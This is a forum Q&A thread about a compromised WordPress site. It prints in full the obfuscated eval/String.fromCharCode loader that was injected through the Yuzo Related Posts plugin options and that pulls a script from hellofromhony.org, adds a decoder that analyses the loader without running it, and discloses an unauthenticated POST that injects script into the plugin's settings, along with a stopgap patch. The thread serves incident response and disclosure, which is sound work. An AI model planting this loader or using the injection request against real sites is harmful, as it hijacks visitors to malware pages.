About an hour ago, a WordPress site I manage started redirecting to ad/malware pages.
I found the source of the redirect and want to share it to help others affected, and I also need help finding the actual vulnerability and/or a fix.
The redirect happens after the site has finished loading, so I looked through the page for JavaScript snippets and checked the network analyzer for suspicious redirects. The obvious malicious redirects were to hellofromhony.org, thebiggestfavoritemake.com, nnatrevaleur.tk and a site that tried to grab my current location (though I could not reproduce that one more than once).
I was able to trace the redirect back to https://hellofromhony.org/counter, which is embedded via a code snippet.
The snippet is embedded in a wp_options entry with the key "yuzo_related_post_options", more specifically in the JSON option "yuzo_related_post_css_and_style" inside option_value. The option is echoed without any sanitization.
This option belongs to the Yuzo Related Posts plugin, which was discontinued about a week ago: https://wordpress.org/plugins/yuzo-related-post/
Removing the plugin stopped the redirects immediately, and I could not find any other traces of tampering with the site.
The snippet in option_value:
</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>
While removing the plugin, I would also like to dig deeper to make sure nobody gained access to the database, the backend or the web space.
Answer (score: 8)
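To see what a snippet like the one above does without executing it, the following decoder (an added example, not code from the original post) peels the eval(String.fromCharCode(...)) wrapper and then inlines the inner String.fromCharCode calls so the injected script reads as plain JavaScript. The fixture is constructed: it is the posted snippet's inner layer (the text the outer eval decodes to) re-wrapped in the same eval(String.fromCharCode(...)) form, so both decoding levels are exercised; the function and constant names are the example's own.

```javascript
'use strict';

// Added example (not from the original post): statically decode an
// eval(String.fromCharCode(...)) payload such as the one stored in the
// yuzo_related_post_css_and_style option. eval() is never called.

// Matches one String.fromCharCode(n, n, ...) call and captures the number list.
const FROM_CHAR_CODE = /String\.fromCharCode\(\s*([\d\s,]*)\)/g;
// Matches the outer eval(String.fromCharCode(...)) wrapper.
const EVAL_WRAPPER = /eval\(\s*String\.fromCharCode\(\s*([\d\s,]*)\)\s*\)/;

// Turn a list such as "118, 97, 114" into the text it encodes.
function charCodesToString(numberList) {
  return numberList
    .split(',')
    .map((n) => n.trim())
    .filter((n) => n.length > 0)
    .map((n) => String.fromCharCode(Number(n)))
    .join('');
}

// Replace every String.fromCharCode(...) call with the equivalent quoted
// string literal so the surrounding code becomes readable.
function inlineCharCodeStrings(source) {
  return source.replace(FROM_CHAR_CODE, (_match, numbers) =>
    JSON.stringify(charCodesToString(numbers)));
}

// Peel eval(String.fromCharCode(...)) layers (bounded, in case a sample is
// wrapped several times), then inline the remaining encoded strings.
function deobfuscate(snippet) {
  let current = snippet;
  for (let depth = 0; depth < 10; depth++) {
    const m = EVAL_WRAPPER.exec(current);
    if (!m) break;
    current = charCodesToString(m[1]);
  }
  return inlineCharCodeStrings(current);
}

// Collect every http(s) URL in the decoded script: these are the indicators
// to search for in wp_options, theme files and uploads when checking for
// further tampering.
function extractUrls(decodedSource) {
  const urls = decodedSource.match(/https?:\/\/[^\s"'<>)]+/g);
  return urls ? Array.from(new Set(urls)) : [];
}

// Constructed fixture: the inner layer of the posted snippet (what its outer
// eval decodes to), re-encoded here into the same two-level shape.
const INNER_LAYER =
  'var dd = String.fromCharCode(115, 99, 114, 105, 112, 116);' +
  'var elem = document.createElement(dd); ' +
  'var hh = String.fromCharCode(104, 101, 97, 100);' +
  'var zz = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, ' +
  '115, 99, 114, 105, 112, 116);' +
  'elem.type = zz; elem.async = true;' +
  'elem.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 104, ' +
  '101, 108, 108, 111, 102, 114, 111, 109, 104, 111, 110, 121, 46, 111, 114, ' +
  '103, 47, 99, 111, 117, 110, 116, 101, 114);' +
  'document.getElementsByTagName(hh)[0].appendChild(elem);';

// Encode text as a String.fromCharCode(...) call (used only to build the fixture).
function toCharCodeCall(text) {
  const codes = Array.from(text, (c) => c.charCodeAt(0)).join(', ');
  return `String.fromCharCode(${codes})`;
}

const SAMPLE_SNIPPET =
  `</style><script language=javascript>eval(${toCharCodeCall(INNER_LAYER)});</script>`;

const DECODED = deobfuscate(SAMPLE_SNIPPET);
console.log(DECODED);
console.log('indicators:', extractUrls(DECODED));
```

Run with node. The decoded source shows the payload creating a script element with type "text/javascript", async set, and src "https://hellofromhony.org/counter", then appending it to head; that matches the redirect traced in the post, and the extracted URL list is what to grep for across the rest of the site.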
I believe I've just found it: the Yuzo Related Posts plugin does not check authentication when saving its options.
So POSTing
yuzo_related_post_css_and_style=</style><script+language=javascript>alert('hacked');</script>
to /wp-admin/options-general.php?page=yuzo-related-post succeeds even if you are not logged in.
The plugin uses is_admin() to check authentication, but that is a "false friend": it only checks whether the page being accessed is in the admin area, not whether the user is authenticated (or authorized). See the WordPress documentation.
A quick fix that lets you keep using the plugin is to disable saving the options by adding false to the if statement at line 1155 of /assets/functions/options.php:
function __construct(){
    global $if_utils;
    $this->utils = $if_utils;
    // is_admin() replaced by false so the option-saving branch is never reached
    if(false/* is_admin() */)
        self::configuration_plugin();
    else
        self::parameters();
}
Update:
Hang Guan pointed to a Blog Post about this issue from last week; it now appears to be "in the wild".